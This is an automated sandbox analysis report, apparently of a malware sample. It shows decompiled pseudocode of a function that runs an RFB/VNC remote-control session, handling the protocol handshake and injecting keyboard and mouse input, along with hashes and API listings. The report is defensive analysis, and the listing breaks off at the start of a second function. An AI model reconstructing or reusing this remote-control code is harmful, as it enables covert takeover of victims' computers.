    • Opcode Fuzzy Hash: 0b38d4166c97423a5f8d304d28608425d6747f86a0d6dcf0ae88f4484c92d8ac
    • Instruction Fuzzy Hash: B5316071504345AFC720EF65ED48DABBBECEBC4710F01883AFA54A21A1D775C904CB6A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00413758, Relevance: 13.0, APIs: 3, Strings: 4, Instructions: 727keyboardnetworkCOMMONCrypto
    Download Yara Rule
    C-Code - Quality: 59%
    			E00413758(void* __eflags, char _a4, int* _a8, signed int _a12, signed int _a15) {
				signed char _v9;
				int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v33;
				intOrPtr _v35;
				signed int _v36;
				char _v40;
				short _v45;
				short _v47;
				char _v48;
				char _v53;
				char _v56;
				char _v57;
				char _v60;
				char _v64;
				signed int _v68;
				unsigned int _v73;
				signed int _v76;
				signed int _v80;
				char _v93;
				char _v94;
				unsigned int _v96;
				signed int _v100;
				char _v116;
				signed short _v118;
				signed short _v120;
				char _v124;
				char _v132;
				char _v392;
				char _v648;
				void* __esi;
				int _t244;
				void* _t246;
				signed char _t250;
				unsigned int _t258;
				signed int _t263;
				int _t270;
				signed int _t292;
				signed int _t296;
				signed int _t297;
				void* _t299;
				signed int _t300;
				void* _t304;
				void* _t313;
				signed int _t320;
				signed int _t321;
				void* _t323;
				signed int _t324;
				signed short _t326;
				unsigned int _t327;
				signed int _t330;
				signed int _t332;
				signed int _t334;
				intOrPtr _t336;
				signed int _t340;
				void* _t342;
				signed int _t343;
				signed int _t349;
				signed int _t351;
				signed int _t352;
				void* _t354;
				signed int _t355;
				signed int _t360;
				signed int* _t361;
				signed short _t363;
				signed int _t366;
				signed int* _t368;
				signed int _t369;
				void* _t371;
				signed int _t372;
				signed int _t373;
				signed char _t376;
				signed char _t378;
				signed char _t380;
				signed int _t389;
				signed int _t398;
				void* _t407;
				signed int _t408;
				void* _t410;
				signed int _t411;
				signed int _t421;
				int _t426;
				signed int _t432;
				signed int _t436;
				signed int _t443;
				signed int _t444;
				int _t472;
				unsigned int _t474;
				signed char _t480;
				signed int _t482;
				signed char _t484;
				intOrPtr _t495;
				void* _t496;
				signed int _t503;
				signed int _t515;
				signed int _t517;
				signed int _t525;
				signed int _t526;
				int* _t533;
				signed int _t544;
				intOrPtr* _t553;
				void* _t554;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				void* _t560;

				_t533 = _a8;
				_t244 = E0041059E(_a4, "RFB 003.003\n", 0xc);
				if(_t244 == 0) {
					L124:
					return _t244;
				}
				_push(0x1b7740);
				_push( &_v64);
				_push(_a4);
				_t246 = 0xc;
				_t244 = E0041053D(_t246);
				if(_t244 == 0) {
					goto L124;
				}
				_push( &_v64);
				_t496 = 4;
				_t244 = E0040F547(_t496, "RFB ", _t496);
				if(_t244 != 0) {
					goto L124;
				}
				_v57 = 0;
				_v53 = 0;
				_t250 = E0040F2EB( &_v56, "RFB ");
				_t244 = ((E0040F2EB( &_v60, "RFB ") & 0x000000ff | (_t250 & 0x000000ff) << 0x00000008) & 0x0000ffff) + 0xfffffcfd;
				if(_t244 > 0x300) {
					goto L124;
				} else {
					_v24 = 1;
					_v40 = 0;
					_t533[1]( &_v40);
					_t258 = _v24;
					_t503 = (_t258 & 0x0000ff00 | _t258 << 0x00000010) << 8;
					_t452 = (_t258 & 0x00ff0000 | _t258 >> 0x00000010) >> 0x00000008 | _t503;
					_v28 = (_t258 & 0x00ff0000 | _t258 >> 0x00000010) >> 0x00000008 | _t503;
					if(E0041059E(_a4,  &_v28, 4) == 0) {
						_v24 = _v24 | 0xffffffff;
					}
					_t263 = _v24;
					if(_t263 == 0) {
						return E004136F2(_t452, __eflags, _a4, _v40);
					}
					_t244 = _t263 - 1;
					if(_t244 != 0) {
						goto L124;
					}
					_t244 = E0041053D(1, _a4,  &_v9, 0x1b7740);
					if(_t244 == 0) {
						goto L124;
					}
					_t244 = _t533[2]();
					if(_t244 == 0) {
						goto L124;
					}
					_v40 = 0;
					_t244 = _t533[3]( &_v132);
					_t455 = _t244;
					_t573 = _t244;
					if(_t244 == 0) {
						goto L124;
					}
					_t244 = E00413521( &_v132, _t455,  &_v40, _t573, _a12);
					_v16 = _t244;
					if(_t244 == 0) {
						goto L124;
					}
					_t544 = E0040F521(_v40);
					_t270 = _v16;
					_v120 =  *(_t270 + 4) << 0x00000008 |  *(_t270 + 5) & 0x000000ff;
					_v118 =  *(_t270 + 6) << 0x00000008 |  *(_t270 + 7) & 0x000000ff;
					_v100 = (_t544 & 0x00ff0000 | _t544 >> 0x00000010) >> 0x00000008 | (_t544 << 0x00000010 | _t544 & 0x0000ff00) << 0x00000008;
					E0040F0FC( &_v116, _v16 + 0x20, 0x10);
					asm("rol word [ebp-0x6c], 0x8");
					asm("rol word [ebp-0x6a], 0x8");
					asm("rol word [ebp-0x68], 0x8");
					if(E0041059E(_a4,  &_v120, 0x18) == 0 || _t544 > 0 && E0041059E(_a4, _v40, _t544) == 0) {
						return E004136BC(_v16);
					} else {
						_t469 = 0xffff;
						_v45 = 0xffff;
						_v48 = 0;
						_v47 = 0xffff;
						E0040F173( &_v648,  &_v648, 0, 0xff);
						E0040F173( &_v392,  &_v392, 0, 0xff);
						_v20 = 0;
						_v24 = 0;
						L16:
						while(_v20 <= 0 || E0041080E(0,  &_a4, 0x12c, 0) != 0xffffffff) {
							_t292 = E0041053D(1, _a4,  &_v9, 0x1b7740);
							__eflags = _t292;
							if(_t292 == 0) {
								L121:
								E004136BC(_v16);
								return E0040F0C0(_v24);
							}
							_t296 = _v9 & 0x000000ff;
							__eflags = _t296;
							if(_t296 == 0) {
								_t297 = E0041056F(_t469, _a4, 3, 0x1b7740);
								__eflags = _t297;
								if(_t297 == 0) {
									goto L121;
								}
								_push(0x1b7740);
								_push( &_v96);
								_push(_a4);
								_t299 = 0x10;
								_t300 = E0041053D(_t299);
								__eflags = _t300;
								if(_t300 == 0) {
									goto L121;
								}
								__eflags = _v96 - 0x20;
								if(_v96 == 0x20) {
									L118:
									__eflags = _v93;
									if(_v93 == 0) {
										goto L121;
									}
									asm("rol word [ebp-0x58], 0x8");
									asm("rol word [ebp-0x56], 0x8");
									asm("rol word [ebp-0x54], 0x8");
									__eflags = _v94;
									_v94 = _t300 & 0xffffff00 | _v94 != 0x00000000;
									_t235 = _v16 + 0x31; // 0x31
									_v93 = 1;
									_t304 = E0040F0FC(_t235,  &_v96, 0x10);
									_t469 = _v96 >> 3;
									 *(_t304 + 0x41) = _v96 >> 3;
									continue;
								}
								__eflags = _v96 - 0x10;
								if(_v96 == 0x10) {
									goto L118;
								}
								__eflags = _v96 - 8;
								if(_v96 != 8) {
									goto L121;
								}
								goto L118;
							}
							_t320 = _t296;
							__eflags = _t320;
							if(_t320 == 0) {
								_t321 = E0041056F(_t469, _a4, 1, 0x1b7740);
								__eflags = _t321;
								if(_t321 == 0) {
									goto L121;
								}
								_push(0x1b7740);
								_push( &_v80);
								_push(_a4);
								_t323 = 2;
								_t324 = E0041053D(_t323);
								__eflags = _t324;
								if(_t324 == 0) {
									goto L121;
								}
								_t472 = _v16;
								 *(_t472 + 0x4c) =  *(_t472 + 0x4c) & 0x00000000;
								asm("rol ax, 0x8");
								_t326 = _v80 & 0x0000ffff;
								 *(_t472 + 0x48) = _t326;
								__eflags = _t326;
								if(_t326 <= 0) {
									L107:
									_t426 = _t472;
									L108:
									_t327 =  *(_t426 + 0x4c);
									_t469 =  *(_t426 + 0x4f) & 0x000000ff;
									_t515 = (_t327 << 0x00000010 | _t327 & 0x0000ff00) << 0x00000008 | _t327 >> 0x00000008 & 0x0000ff00 |  *(_t426 + 0x4f) & 0x000000ff;
									 *(_t426 + 0x50) = _t515;
									__eflags = _t327 - 5;
									if(_t327 != 5) {
										E0040F0C0( *(_t426 + 0x1c));
										 *(_t426 + 0x1c) =  *(_t426 + 0x1c) & 0x00000000;
										continue;
									}
									__eflags =  *(_t426 + 0x1c);
									if( *(_t426 + 0x1c) != 0) {
										continue;
									}
									_t330 = E0040F0A8(0x400);
									_t469 = _v16;
									 *(_v16 + 0x1c) = _t330;
									__eflags = _t330;
									if(_t330 != 0) {
										continue;
									}
									goto L121;
								}
								_t428 = (_t326 & 0x0000ffff) << 2;
								_t553 = _t472 + 0x44;
								_t332 = E0040F053((_t326 & 0x0000ffff) << 2, _t553);
								__eflags = _t332;
								if(_t332 == 0) {
									goto L121;
								}
								_t334 = E0041053D(_t428, _a4,  *_t553, 0x1b7740);
								__eflags = _t334;
								if(_t334 == 0) {
									goto L121;
								}
								_t426 = _v16;
								_a12 = _a12 & 0x00000000;
								__eflags = 0 -  *((intOrPtr*)(_t426 + 0x48));
								if(0 >=  *((intOrPtr*)(_t426 + 0x48))) {
									goto L108;
								}
								_t336 =  *_t553;
								do {
									_t517 = (_a12 & 0x0000ffff) << 2;
									 *(_t517 + _t336) = ( *(_t517 + _t336) << 0x00000010 |  *(_t517 + _t336) & 0x0000ff00) << 0x00000008 |  *(_t494 + 3) & 0x000000ff |  *(_t517 + _t336) >> 0x00000008 & 0x0000ff00;
									_t336 =  *_t553;
									_t495 = 5;
									__eflags =  *(_t517 + _t336) - _t495;
									if( *(_t517 + _t336) == _t495) {
										 *((intOrPtr*)(_v16 + 0x4c)) = _t495;
									}
									_a12 = _a12 + 1;
									_t472 = _v16;
									__eflags = _a12 -  *(_t472 + 0x48);
								} while (_a12 <  *(_t472 + 0x48));
								_t533 = _a8;
								goto L107;
							}
							_t340 = _t320 - 1;
							__eflags = _t340;
							if(_t340 == 0) {
								_push(0x1b7740);
								_push( &_v60);
								_push(_a4);
								_t342 = 9;
								_t343 = E0041053D(_t342);
								__eflags = _t343;
								if(_t343 == 0) {
									goto L121;
								}
								asm("rol word [ebp-0x37], 0x8");
								asm("rol word [ebp-0x35], 0x8");
								asm("rol word [ebp-0x33], 0x8");
								asm("rol word [ebp-0x31], 0x8");
								__eflags = _v60;
								_t469 = 0;
								_t432 = 0;
								_v60 = _t343 & 0xffffff00 | _v60 != 0x00000000;
								__eflags = _v20;
								if(_v20 <= 0) {
									L93:
									__eflags = _t432 - _v20;
									if(_t432 != _v20) {
										L95:
										E0040F0FC(_t432 * 9 + _v24,  &_v60, 9);
										continue;
									}
									_v20 = _v20 + 1;
									_t349 = E0040F053(_v20 * 9,  &_v24);
									__eflags = _t349;
									if(_t349 == 0) {
										goto L121;
									}
									goto L95;
								}
								_t351 = _v24 + 7;
								__eflags = _t351;
								do {
									__eflags =  *((intOrPtr*)(_t351 - 2)) - _t469;
									if( *((intOrPtr*)(_t351 - 2)) != _t469) {
										goto L92;
									}
									__eflags =  *_t351 - _t469;
									if( *_t351 == _t469) {
										goto L93;
									}
									L92:
									_t432 = _t432 + 1;
									_t351 = _t351 + 9;
									__eflags = _t432 - _v20;
								} while (_t432 < _v20);
								goto L93;
							}
							_t352 = _t340 - 1;
							__eflags = _t352;
							if(_t352 == 0) {
								_push(0x1b7740);
								_push( &_v76);
								_push(_a4);
								_t354 = 7;
								_t355 = E0041053D(_t354);
								__eflags = _t355;
								if(_t355 == 0) {
									goto L121;
								}
								_t474 = _v73;
								_t525 = (_t474 << 0x00000010 | _t474 & 0x0000ff00) << 8;
								_t360 = (_t474 & 0x00ff0000 | _t474 >> 0x00000010) >> 0x00000008 | _t525;
								__eflags = _v76;
								_v73 = _t360;
								_t515 = _t525 & 0xffffff00 | _v76 != 0x00000000;
								__eflags = _t515;
								_v76 = _t515;
								_v28 = (0 | _t515 != 0x00000000) - 0x00000001 & 0xc0000000;
								_t480 = 0;
								__eflags = 0;
								while(1) {
									_t556 = _t480 & 0x000000ff;
									__eflags =  *((intOrPtr*)(0x4011c8 + _t556 * 8)) - _t360;
									if( *((intOrPtr*)(0x4011c8 + _t556 * 8)) == _t360) {
										break;
									}
									_t480 = _t480 + 1;
									__eflags = _t480 - 0x32;
									if(_t480 < 0x32) {
										continue;
									}
									L71:
									_a15 = 0;
									do {
										_t469 = (_a15 & 0x000000ff) * 0xc;
										_t153 = _t469 + 0x4011a0; // 0xffbe
										__eflags = _t360 -  *_t153;
										if(_t360 <  *_t153) {
											goto L74;
										}
										_t154 = _t469 + 0x4011a4; // 0xffd5
										__eflags = _t360 -  *_t154;
										if(_t360 <=  *_t154) {
											_t469 = (_a15 & 0x000000ff) * 0xc;
											_t159 = _t469 + 0x4011a8; // 0x70
											_t160 = _t469 + 0x4011a0; // 0xffbe
											_t436 =  *_t159 -  *_t160 + _v73;
											__eflags = _t436;
											L77:
											__eflags = _t436;
											if(_t436 != 0) {
												_t469 = _t436 & 0x000000ff;
												_t361 = _t560 + _t469 - 0x284;
												__eflags =  *_t361 - _t515;
												if( *_t361 == _t515) {
													goto L16;
												}
												 *_t361 = _t515;
												_t363 = MapVirtualKeyW(_t469, 0) & 0x0000ffff;
												__eflags = _t363;
												if(_t363 == 0) {
													goto L16;
												}
												_t366 = (_t363 & 0x0000ffff) << 0x00000010 | _v28;
												__eflags = _t366;
												_push(0);
												_push(_t366);
												_t515 = _t436;
												L86:
												_t469 =  *_t533;
												_t533[5]();
												goto L16;
											}
											__eflags = _t360 - 0x20;
											if(_t360 < 0x20) {
												L80:
												_t162 = _t360 - 0xa0; // 0xff1e
												_t469 = _t162;
												__eflags = _t162 - 0x5f;
												if(_t162 > 0x5f) {
													goto L16;
												}
												L81:
												_t368 = _t560 + _t360 - 0x184;
												__eflags =  *_t368 - _t515;
												if( *_t368 == _t515) {
													goto L16;
												}
												_push(1);
												_push(_v28);
												 *_t368 = _t515;
												_t515 = _v73;
												goto L86;
											}
											__eflags = _t360 - 0x7e;
											if(_t360 <= 0x7e) {
												goto L81;
											}
											goto L80;
										}
										L74:
										_a15 = _a15 + 1;
										__eflags = _a15 - 3;
									} while (_a15 < 3);
									goto L77;
								}
								_t482 = (_t480 & 0x000000ff) << 3;
								__eflags =  *((char*)(_t482 + 0x4011cd));
								_t436 =  *((intOrPtr*)(_t482 + 0x4011cc));
								if( *((char*)(_t482 + 0x4011cd)) != 0) {
									_t149 =  &_v28;
									 *_t149 = _v28 | 0x01000000;
									__eflags =  *_t149;
								}
								goto L71;
							}
							_t369 = _t352 - 1;
							__eflags = _t369;
							if(_t369 == 0) {
								_push(0x1b7740);
								_push( &_v36);
								_push(_a4);
								_t371 = 5;
								_t372 = E0041053D(_t371);
								__eflags = _t372;
								if(_t372 == 0) {
									goto L121;
								}
								asm("rol word [ebp-0x1f], 0x8");
								asm("rol word [ebp-0x1d], 0x8");
								_a12 = _a12 & 0x00000000;
								_t557 = 0x8000;
								_t373 = GetSystemMetrics(0x17);
								__eflags = _t373;
								_t526 = _t515 & 0xffffff00 | _t373 != 0x00000000;
								__eflags = _v35 - _v47;
								if(_v35 != _v47) {
									L46:
									_t557 = 0x8001;
									L47:
									_t484 = _v48;
									_t376 = _v36 & 0x00000001;
									__eflags = _t376 - (_t484 & 0x00000001);
									if(_t376 != (_t484 & 0x00000001)) {
										__eflags = _t376;
										if(_t376 == 0) {
											__eflags = _t526;
											_t398 = ((0 | _t526 == 0x00000000) - 0x00000001 & 0x0000000c) + 4;
											__eflags = _t398;
										} else {
											__eflags = _t526;
											_t398 = ((0 | _t526 == 0x00000000) - 0x00000001 & 0x00000006) + 2;
										}
										_t557 = _t557 | _t398;
										__eflags = _t557;
									}
									_t378 = _v36 & 0x00000004;
									__eflags = _t378 - (_t484 & 0x00000004);
									if(_t378 != (_t484 & 0x00000004)) {
										__eflags = _t378;
										if(_t378 == 0) {
											__eflags = _t526;
											_t389 = ((0 | _t526 == 0x00000000) - 0x00000001 & 0xfffffff4) + 0x10;
											__eflags = _t389;
										} else {
											__eflags = _t526;
											_t389 = ((0 | _t526 == 0x00000000) - 0x00000001 & 0xfffffffa) + 8;
										}
										_t557 = _t557 | _t389;
										__eflags = _t557;
									}
									_t380 = _v36 & 0x00000002;
									__eflags = _t380 - (_t484 & 0x00000002);
									if(_t380 != (_t484 & 0x00000002)) {
										__eflags = _t380;
										_t557 = _t557 | ((0 | _t380 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x00000040;
										__eflags = _t557;
									}
									__eflags = _v36 & 0x00000008;
									if((_v36 & 0x00000008) != 0) {
										_t557 = _t557 | 0x00000800;
										__eflags = _t557;
										_a12 = 0x78;
									}
									__eflags = _v36 & 0x00000010;
									if((_v36 & 0x00000010) != 0) {
										_t557 = _t557 | 0x00000800;
										__eflags = _t557;
										_a12 = 0xffffff88;
									}
									E0040F0FC( &_v48,  &_v36, 5);
									_t469 =  *_t533;
									_t515 = _t557;
									_t533[6](_v35, _v33, _a12);
									continue;
								}
								__eflags = _v33 - _v45;
								if(_v33 == _v45) {
									goto L47;
								}
								goto L46;
							}
							__eflags = _t369 != 1;
							if(_t369 != 1) {
								goto L121;
							}
							_push(0x1b7740);
							_push( &_v124);
							_push(_a4);
							_t407 = 3;
							_t408 = E0041053D(_t407);
							__eflags = _t408;
							if(_t408 == 0) {
								goto L121;
							}
							_push(0x1b7740);
							_push( &_v68);
							_push(_a4);
							_t410 = 4;
							_t411 = E0041053D(_t410);
							__eflags = _t411;
							if(_t411 == 0) {
								goto L121;
							}
							_v68 = (_v68 & 0x00ff0000 | _v68 >> 0x00000010) >> 0x00000008 | (_v68 << 0x00000010 | _v68 & 0x0000ff00) << 0x00000008;
							_t558 = E0040F0A8(((_v68 & 0x00ff0000 | _v68 >> 0x00000010) >> 0x00000008 | (_v68 << 0x00000010 | _v68 & 0x0000ff00) << 0x00000008) + 1);
							__eflags = _t558;
							if(_t558 == 0) {
								E0040F0C0(0);
								goto L121;
							}
							_t421 = E0041053D(_v68, _a4, _t558, 0x1b7740);
							__eflags = _t421;
							if(_t421 == 0) {
								goto L121;
							}
							_t515 = _v68;
							_t469 =  *_t533;
							_t533[7](_t558);
							E0040F0C0(_t558);
						}
						if( *0x416de4() != 0x274c) {
							goto L121;
						}
						_t469 =  *_t533;
						_t533[4]();
						_t443 = _v20;
						_a12 = _a12 & 0x00000000;
						if(_t443 <= 0) {
							goto L16;
						}
						_v28 = _v28 & 0x00000000;
						_t444 = _t443 * 9;
						do {
							_t469 = _v24;
							_t554 = _v28 + _v24;
							if( *((short*)(_t554 + 5)) > 0 &&  *((short*)(_t554 + 7)) > 0) {
								_push(_t554);
								_push(_a4);
								_t313 = E00413163(_v16);
								if(_t313 == 0xffffffff || _t313 == 0) {
									goto L121;
								} else {
									if(_t313 == 1) {
										if(_a12 + 1 != _v20) {
											E0040F161(_t554, 9);
										} else {
											_v20 = _v20 - 1;
											_t444 = _t444 - 9;
											E0040F053(_t444,  &_v24);
										}
									}
									goto L29;
								}
							}
							L29:
							_a12 = _a12 + 1;
							_v28 = _v28 + 9;
						} while (_a12 < _v20);
						goto L16;
					}
				}
			}















































































































    0x00413764
    0x00413771
    0x00413778
    0x00414042
    0x00414042
    0x00414042
    0x0041377e
    0x00413786
    0x00413787
    0x0041378c
    0x0041378d
    0x00413794
    0x00000000
    0x00000000
    0x0041379d
    0x004137a0
    0x004137a8
    0x004137af
    0x00000000
    0x00000000
    0x004137ba
    0x004137bd
    0x004137c0
    0x004137df
    0x004137ec
    0x00000000
    0x004137f2
    0x004137fe
    0x00413801
    0x00413804
    0x00413807
    0x0041382e
    0x00413835
    0x00413837
    0x00413841
    0x00413843
    0x00413843
    0x0041384a
    0x0041384c
    0x00000000
    0x00414039
    0x00413852
    0x00413853
    0x00000000
    0x00000000
    0x00413867
    0x0041386e
    0x00000000
    0x00000000
    0x0041387c
    0x00413881
    0x00000000
    0x00000000
    0x00413890
    0x00413893
    0x00413896
    0x00413898
    0x0041389a
    0x00000000
    0x00000000
    0x004138a6
    0x004138ab
    0x004138b0
    0x00000000
    0x00000000
    0x004138be
    0x004138c0
    0x004138d3
    0x004138e7
    0x00413910
    0x00413920
    0x00413925
    0x0041392a
    0x0041392f
    0x00413944
    0x00000000
    0x00413962
    0x0041396d
    0x0041396f
    0x0041397b
    0x0041397e
    0x00413982
    0x00413990
    0x00413995
    0x00413998
    0x00000000
    0x0041399b
    0x00413a67
    0x00413a6c
    0x00413a6e
    0x00414017
    0x0041401a
    0x00000000
    0x00414022
    0x00413a78
    0x00413a78
    0x00413a7b
    0x00413f9a
    0x00413f9f
    0x00413fa1
    0x00000000
    0x00000000
    0x00413fa3
    0x00413fab
    0x00413fac
    0x00413fb1
    0x00413fb2
    0x00413fb7
    0x00413fb9
    0x00000000
    0x00000000
    0x00413fbb
    0x00413fbf
    0x00413fcd
    0x00413fcd
    0x00413fd1
    0x00000000
    0x00000000
    0x00413fd3
    0x00413fd8
    0x00413fdd
    0x00413fe2
    0x00413feb
    0x00413ff5
    0x00413ff9
    0x00413ffd
    0x00414005
    0x00414008
    0x00000000
    0x00414008
    0x00413fc1
    0x00413fc5
    0x00000000
    0x00000000
    0x00413fc7
    0x00413fcb
    0x00000000
    0x00000000
    0x00000000
    0x00413fcb
    0x00413a82
    0x00413a82
    0x00413a83
    0x00413e4a
    0x00413e4f
    0x00413e51
    0x00000000
    0x00000000
    0x00413e57
    0x00413e5f
    0x00413e60
    0x00413e65
    0x00413e66
    0x00413e6b
    0x00413e6d
    0x00000000
    0x00000000
    0x00413e73
    0x00413e7a
    0x00413e7e
    0x00413e82
    0x00413e85
    0x00413e89
    0x00413e8c
    0x00413f29
    0x00413f29
    0x00413f2b
    0x00413f2b
    0x00413f45
    0x00413f4e
    0x00413f50
    0x00413f53
    0x00413f56
    0x00413f82
    0x00413f87
    0x00000000
    0x00413f87
    0x00413f58
    0x00413f5c
    0x00000000
    0x00000000
    0x00413f67
    0x00413f6c
    0x00413f6f
    0x00413f72
    0x00413f74
    0x00000000
    0x00000000
    0x00000000
    0x00413f7a
    0x00413e97
    0x00413e9a
    0x00413e9f
    0x00413ea4
    0x00413ea6
    0x00000000
    0x00000000
    0x00413eb8
    0x00413ebd
    0x00413ebf
    0x00000000
    0x00000000
    0x00413ec5
    0x00413ec8
    0x00413ece
    0x00413ed2
    0x00000000
    0x00000000
    0x00413ed4
    0x00413ed6
    0x00413eda
    0x00413f04
    0x00413f06
    0x00413f0a
    0x00413f0b
    0x00413f0e
    0x00413f13
    0x00413f13
    0x00413f16
    0x00413f19
    0x00413f20
    0x00413f20
    0x00413f26
    0x00000000
    0x00413f26
    0x00413a89
    0x00413a89
    0x00413a8a
    0x00413dae
    0x00413db6
    0x00413db7
    0x00413dbc
    0x00413dbd
    0x00413dc2
    0x00413dc4
    0x00000000
    0x00000000
    0x00413dca
    0x00413dcf
    0x00413dd4
    0x00413dd9
    0x00413dde
    0x00413de5
    0x00413de7
    0x00413de9
    0x00413dec
    0x00413def
    0x00413e0b
    0x00413e0b
    0x00413e0e
    0x00413e29
    0x00413e36
    0x00000000
    0x00413e36
    0x00413e10
    0x00413e1c
    0x00413e21
    0x00413e23
    0x00000000
    0x00000000
    0x00000000
    0x00413e23
    0x00413df4
    0x00413df4
    0x00413df7
    0x00413df7
    0x00413dfb
    0x00000000
    0x00000000
    0x00413dfd
    0x00413e00
    0x00000000
    0x00000000
    0x00413e02
    0x00413e02
    0x00413e03
    0x00413e06
    0x00413e06
    0x00000000
    0x00413df7
    0x00413a90
    0x00413a90
    0x00413a91
    0x00413c64
    0x00413c6c
    0x00413c6d
    0x00413c72
    0x00413c73
    0x00413c78
    0x00413c7a
    0x00000000
    0x00000000
    0x00413c80
    0x00413c9e
    0x00413ca4
    0x00413ca6
    0x00413caa
    0x00413cad
    0x00413cb4
    0x00413cb9
    0x00413cc3
    0x00413cc6
    0x00413cc6
    0x00413cc8
    0x00413cc8
    0x00413ccb
    0x00413cd2
    0x00000000
    0x00000000
    0x00413cd4
    0x00413cd6
    0x00413cd9
    0x00000000
    0x00000000
    0x00413cf9
    0x00413cf9
    0x00413cfd
    0x00413d01
    0x00413d04
    0x00413d04
    0x00413d0a
    0x00000000
    0x00000000
    0x00413d0c
    0x00413d0c
    0x00413d12
    0x00413d23
    0x00413d26
    0x00413d2c
    0x00413d32
    0x00413d32
    0x00413d35
    0x00413d35
    0x00413d37
    0x00413d6d
    0x00413d70
    0x00413d77
    0x00413d79
    0x00000000
    0x00000000
    0x00413d82
    0x00413d8a
    0x00413d8d
    0x00413d90
    0x00000000
    0x00000000
    0x00413d9c
    0x00413d9c
    0x00413d9f
    0x00413da1
    0x00413da2
    0x00413da4
    0x00413da4
    0x00413da6
    0x00000000
    0x00413da6
    0x00413d39
    0x00413d3c
    0x00413d43
    0x00413d43
    0x00413d43
    0x00413d49
    0x00413d4c
    0x00000000
    0x00000000
    0x00413d52
    0x00413d52
    0x00413d59
    0x00413d5b
    0x00000000
    0x00000000
    0x00413d61
    0x00413d63
    0x00413d66
    0x00413d68
    0x00000000
    0x00413d68
    0x00413d3e
    0x00413d41
    0x00000000
    0x00000000
    0x00000000
    0x00413d41
    0x00413d14
    0x00413d14
    0x00413d17
    0x00413d17
    0x00000000
    0x00413d1d
    0x00413ce0
    0x00413ce3
    0x00413cea
    0x00413cf0
    0x00413cf2
    0x00413cf2
    0x00413cf2
    0x00413cf2
    0x00000000
    0x00413cf0
    0x00413a97
    0x00413a97
    0x00413a98
    0x00413b43
    0x00413b4b
    0x00413b4c
    0x00413b51
    0x00413b52
    0x00413b57
    0x00413b59
    0x00000000
    0x00000000
    0x00413b5f
    0x00413b64
    0x00413b69
    0x00413b6f
    0x00413b74
    0x00413b7a
    0x00413b80
    0x00413b83
    0x00413b87
    0x00413b93
    0x00413b93
    0x00413b98
    0x00413b98
    0x00413ba0
    0x00413ba5
    0x00413ba7
    0x00413ba9
    0x00413bab
    0x00413bbe
    0x00413bc7
    0x00413bc7
    0x00413bad
    0x00413baf
    0x00413bb9
    0x00413bb9
    0x00413bca
    0x00413bca
    0x00413bca
    0x00413bd1
    0x00413bd6
    0x00413bd8
    0x00413bda
    0x00413bdc
    0x00413bf0
    0x00413bf9
    0x00413bf9
    0x00413bde
    0x00413be0
    0x00413be9
    0x00413be9
    0x00413bfc
    0x00413bfc
    0x00413bfc
    0x00413c01
    0x00413c06
    0x00413c08
    0x00413c0c
    0x00413c18
    0x00413c18
    0x00413c18
    0x00413c1a
    0x00413c1e
    0x00413c20
    0x00413c20
    0x00413c26
    0x00413c26
    0x00413c2d
    0x00413c31
    0x00413c33
    0x00413c33
    0x00413c39
    0x00413c39
    0x00413c4a
    0x00413c52
    0x00413c57
    0x00413c5c
    0x00000000
    0x00413c5c
    0x00413b8d
    0x00413b91
    0x00000000
    0x00000000
    0x00000000
    0x00413b91
    0x00413a9e
    0x00413a9f
    0x00000000
    0x00000000
    0x00413aa5
    0x00413aad
    0x00413aae
    0x00413ab3
    0x00413ab4
    0x00413ab9
    0x00413abb
    0x00000000
    0x00000000
    0x00413ac1
    0x00413ac9
    0x00413aca
    0x00413acf
    0x00413ad0
    0x00413ad5
    0x00413ad7
    0x00000000
    0x00000000
    0x00413b03
    0x00413b0c
    0x00413b0e
    0x00413b10
    0x00414012
    0x00000000
    0x00414012
    0x00413b22
    0x00413b27
    0x00413b29
    0x00000000
    0x00000000
    0x00413b2f
    0x00413b32
    0x00413b35
    0x00413b39
    0x00413b39
    0x004139cb
    0x00000000
    0x00000000
    0x004139d1
    0x004139d3
    0x004139d6
    0x004139d9
    0x004139df
    0x00000000
    0x00000000
    0x004139e1
    0x004139e5
    0x004139e8
    0x004139eb
    0x004139ee
    0x004139f6
    0x00413a02
    0x00413a03
    0x00413a06
    0x00413a0e
    0x00000000
    0x00413a1c
    0x00413a1f
    0x00413a28
    0x00413a3f
    0x00413a2a
    0x00413a2a
    0x00413a2d
    0x00413a35
    0x00413a35
    0x00413a28
    0x00000000
    0x00413a1f
    0x00413a0e
    0x00413a44
    0x00413a44
    0x00413a4a
    0x00413a4e
    0x00000000
    0x00413a53
    0x00413944

    APIs
      • Part of subcall function 0041059E: send.WS2_32(0000000C,0000000C,0000000C,00000000), ref: 004105AC
    • WSAGetLastError.WS2_32(?,0000012C,00000000,00000031,00000020,00000010,?,?,001B7740,?,00000003,001B7740,?,?,001B7740,?), ref: 004139C0
      • Part of subcall function 00413163: SelectObject.GDI32(?,?), ref: 00413192
      • Part of subcall function 00413163: SelectObject.GDI32(?,00000000), ref: 004131CB
    • GetSystemMetrics.USER32(00000017), ref: 00413B74
    • MapVirtualKeyW.USER32(00000000,00000000), ref: 00413D84
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: ObjectSelect$ErrorLastMetricsSystemVirtualsend
    • String ID: $RFB $RFB 003.003$x
    • API String ID: 3800035660-914445781
    • Opcode ID: f03e16390c05876003d196f5119de7119b307f51ede7dded3d0bbe7a1c07eaab
    • Instruction ID: 698ccea15abeba6b541060362cf8f4724d2f02bec1deccea95f10b8b14db5bfe
    • Opcode Fuzzy Hash: f03e16390c05876003d196f5119de7119b307f51ede7dded3d0bbe7a1c07eaab
    • Instruction Fuzzy Hash: C0424531D00249ABDF24DFA5C845BEE7BB5EF44344F54406BE941AB282DB7C8E85CB98
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040486E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74stringtimeCOMMON
    Download Yara Rule
    C-Code - Quality: 82%
    			E0040486E(void* __ecx, void* __edx) {
				intOrPtr _t19;
				intOrPtr _t25;
				void* _t36;
				intOrPtr _t37;
				void* _t39;
				void* _t41;
				void* _t42;
				void* _t45;
				intOrPtr* _t46;
				void* _t48;
				void* _t50;

				_t41 = __edx;
				_t39 = __ecx;
				_t48 = _t50 - 0x6c;
				_t37 =  *((intOrPtr*)(_t48 + 0x78));
				_t46 =  *((intOrPtr*)(_t48 + 0x74));
